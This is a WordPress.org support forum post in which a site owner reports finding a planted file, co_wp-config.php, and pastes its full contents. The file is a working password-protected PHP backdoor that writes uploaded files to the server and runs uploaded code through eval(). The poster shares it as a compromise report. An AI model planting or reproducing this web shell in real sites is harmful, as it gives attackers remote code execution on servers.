WordPress.org

Support

Support » How-To and Troubleshooting » hacked! co_wp-config.php

hacked! co_wp-config.php

  • I’m not an expert by any means, but it looks like my host was comprimised somehow, and a file named “co_wp-config.php” was in my root directory. Here are the contents:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','07d756576bfbc5c28760acb29aa27154');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

    There are several blank lines above and below this code. Nothing seems to be compromised in my blog, except the admin user was somehow changed to subscriber.. got that fixed. This was really weird, so I thought I’d share.

  • The topic ‘hacked! co_wp-config.php’ is closed to new replies.
Skip to toolbar